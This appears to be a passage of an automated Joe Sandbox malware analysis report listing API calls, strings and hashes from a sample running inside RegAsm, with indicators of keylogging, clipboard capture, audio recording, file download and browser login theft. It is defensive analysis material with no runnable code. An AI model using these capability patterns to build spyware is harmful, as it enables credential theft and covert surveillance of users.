                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                          • API String ID: 3472027048-1236744412
                                                          APIs
                                                          • EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
                                                          • EnumDisplayDevicesW.USER32(?), ref: 00419525
                                                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
                                                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DisplayEnum$Devices$Monitors
                                                          • String ID:
                                                          • API String ID: 1432082543-0
                                                          APIs
                                                            • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                                            • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                                            • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                                          • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                          • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$ForegroundLength
                                                          • String ID: [ $ ]
                                                          • API String ID: 3309952895-93608704
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                          • String ID:
                                                          • API String ID: 188215759-0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                          • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                            • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                          • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                          • String ID:
                                                          • API String ID: 2633735394-0
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                                          • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                                          • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                                          • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID:
                                                          • API String ID: 4116985748-0
                                                          APIs
                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                            • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                          • String ID:
                                                          • API String ID: 1761009282-0
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          • API String ID: 3213639722-2276729525
                                                          APIs
                                                          • _free.LIBCMT ref: 1000655C
                                                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                          • String ID: *?$.
                                                          • API String ID: 2667617558-3972193922
                                                          APIs
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                                            • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                            • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                            • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                          • String ID: image/jpeg
                                                          • API String ID: 1291196975-3785015651
                                                          APIs
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          • __Init_thread_footer.LIBCMT ref: 0040B797
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                          • API String ID: 1881088180-3686566968
                                                          • Opcode ID: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
                                                          • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                          • Opcode Fuzzy Hash: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
                                                          • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                          APIs
                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ACP$OCP
                                                          • API String ID: 0-711371036
                                                          • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                          • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                          • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                          • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                          APIs
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                                            • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                                            • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                            • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                          • String ID: image/png
                                                          • API String ID: 1291196975-2966254431
                                                          • Opcode ID: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                          • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                                          • Opcode Fuzzy Hash: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                          • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 481472006-1507639952
                                                          • Opcode ID: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
                                                          • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                          • Opcode Fuzzy Hash: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
                                                          • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                          APIs
                                                          • Sleep.KERNEL32 ref: 00416640
                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DownloadFileSleep
                                                          • String ID: !D@
                                                          • API String ID: 1931167962-604454484
                                                          • Opcode ID: 5095b75c5f9db238aea0001e6592924ae8405ba6706ac8883079950a7719889b
                                                          • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                          • Opcode Fuzzy Hash: 5095b75c5f9db238aea0001e6592924ae8405ba6706ac8883079950a7719889b
                                                          • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: : $Se.
                                                          • API String ID: 4218353326-4089948878
                                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                          • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                          • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                          • API String ID: 481472006-2430845779
                                                          • Opcode ID: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                          • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                          • Opcode Fuzzy Hash: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                          • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: alarm.wav$hYG
                                                          • API String ID: 1174141254-2782910960
                                                          • Opcode ID: 927e0edff403eebb4f9eff2a49ef343572b544c1c63ef3d24774cae310748075
                                                          • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                          • Opcode Fuzzy Hash: 927e0edff403eebb4f9eff2a49ef343572b544c1c63ef3d24774cae310748075
                                                          • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                          APIs
                                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                          • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                          • String ID: Online Keylogger Stopped
                                                          • API String ID: 1623830855-1496645233
                                                          • Opcode ID: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
                                                          • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                          • Opcode Fuzzy Hash: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
                                                          • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                          • String ID: Unknown exception
                                                          • API String ID: 3476068407-410509341
                                                          • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                          • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                          • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                          • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                          APIs
                                                          • waveInPrepareHeader.WINMM(00F616E0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                          • waveInAddBuffer.WINMM(00F616E0,00000020,?,00000000,00401A15), ref: 0040185F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferHeaderPrepare
                                                          • String ID: XMG
                                                          • API String ID: 2315374483-813777761
                                                          • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                          • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                          • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                          • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                          APIs
                                                          • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocaleValid
                                                          • String ID: IsValidLocaleName$JD
                                                          • API String ID: 1901932003-2234456777
                                                          • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                          • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                          • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                          • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                          • API String ID: 1174141254-4188645398
